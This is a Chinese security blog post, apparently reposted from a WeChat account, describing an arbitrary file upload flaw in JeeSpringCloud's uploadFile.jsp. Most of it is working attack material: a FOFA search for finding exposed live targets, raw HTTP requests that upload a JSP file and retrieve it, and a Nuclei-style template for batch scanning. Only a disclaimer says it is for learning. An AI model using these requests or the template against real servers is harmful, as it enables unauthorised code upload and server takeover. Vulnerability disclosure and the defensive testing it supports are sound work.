JeeSpringCloud uploadFile.jsp存在任意文件上传

admin

137989
文章

113
评论

2023年11月14日11:20:40评论354 views字数 2983阅读9分56秒阅读模式

漏洞描述

BEGINNINGO WINTER

JeeSpringCloud 是一款免费开源的 Java 互联网云快速开发平台，JeeSpringCloud 访问 /static/uploadify/uploadFile.jsp 可上传任意文件。

漏洞复现

BEGINNING OF WINTER

步骤一：在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....

#FOFA搜索语法header="com.jeespring.session.id"

步骤二：开启代理并打开BP对其首页进行抓包拦截....修改请求包内容....在响应数据包的正文中返回文件名称。

POST /static/uploadify/uploadFile.jsp?uploadPath=/static/uploadify/ HTTP/1.1Host: ipCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: yourCookieConnection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryxzUhGld6cusN3AlkContent-Length: 227
------WebKitFormBoundaryxzUhGld6cusN3AlkContent-Disposition: form-data; name="fileshare"; filename="123.jsp"Content-Type: image/jpeg
 <% out.println("hello jeespringcloud"); %>------WebKitFormBoundaryxzUhGld6cusN3Alk--

JeeSpringCloud uploadFile.jsp存在任意文件上传

步骤三：访问/static/uploadify/filename，即可回显写入的文件内容。

GET /static/uploadify/2023110707321247231.jsp HTTP/1.1Host: IPUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: com.jeespring.session.id=927de707ee494db4b47d97f8a1a7bca2Connection: close

JeeSpringCloud uploadFile.jsp存在任意文件上传

批量脚本

BEGINNING OF WINTER

id: jeespringcloud-cms-uploadfile-fileupload
info:  name: jeespringcloud-cms-uploadfile-fileupload  author: yy  severity: high  description: JeeSpringCloud 是一款免费开源的 Java 互联网云快速开发平台，JeeSpringCloud 访问 /static/uploadify/uploadFile.jsp 可上传任意文件。  tags: jeespringcloud,fileupload  metadata:    fofa-qeury: header="com.jeespring.session.id"    veified: true    max-request: 2
http:  - raw:      - |                      POST /static/uploadify/uploadFile.jsp?uploadPath=/static/uploadify/ HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryxzUhGld6cusN3Alk        Content-Length: 211
        ------WebKitFormBoundaryxzUhGld6cusN3Alk        Content-Disposition: form-data; name="fileshare"; filename="123.jsp"        Content-Type: image/jpeg
        <% out.println("hello jeespringcloud"); %>        ------WebKitFormBoundaryxzUhGld6cusN3Alk--      - |                      GET /static/uploadify/{{filename}} HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15       
    extractors:      - type: regex        name: filename        part: body        internal: true        regex:          - "[0-9]{19}.jsp"                   matchers:           - type: dsl        name: filename        dsl:          - "status_code_1 == 200 &&contains(body,'hello jeespringcloud') && contains(header,'text/html')"

揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！！！！！

扫码获取更多精彩

原文始发于微信公众号（揽月安全团队）：JeeSpringCloud uploadFile.jsp存在任意文件上传

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

JeeSpringCloud uploadFile.jsp存在任意文件上传

Vulhub-Thinkphp漏洞

vite 漏洞分析

内网基础-Cyberstrikelab靶场lab2

SRC挖掘之接口未授权访问

揭秘天价漏洞BrokenSesame 技术细节

怎么从受限容器到拿下集群：#BrokenSesame

安全测试中的js逆向基础实战

几种通过内网穿透实现外网访问的方法

SRC漏洞提交技巧

若依在真实攻防下的总结

发表评论

在线咨询

微信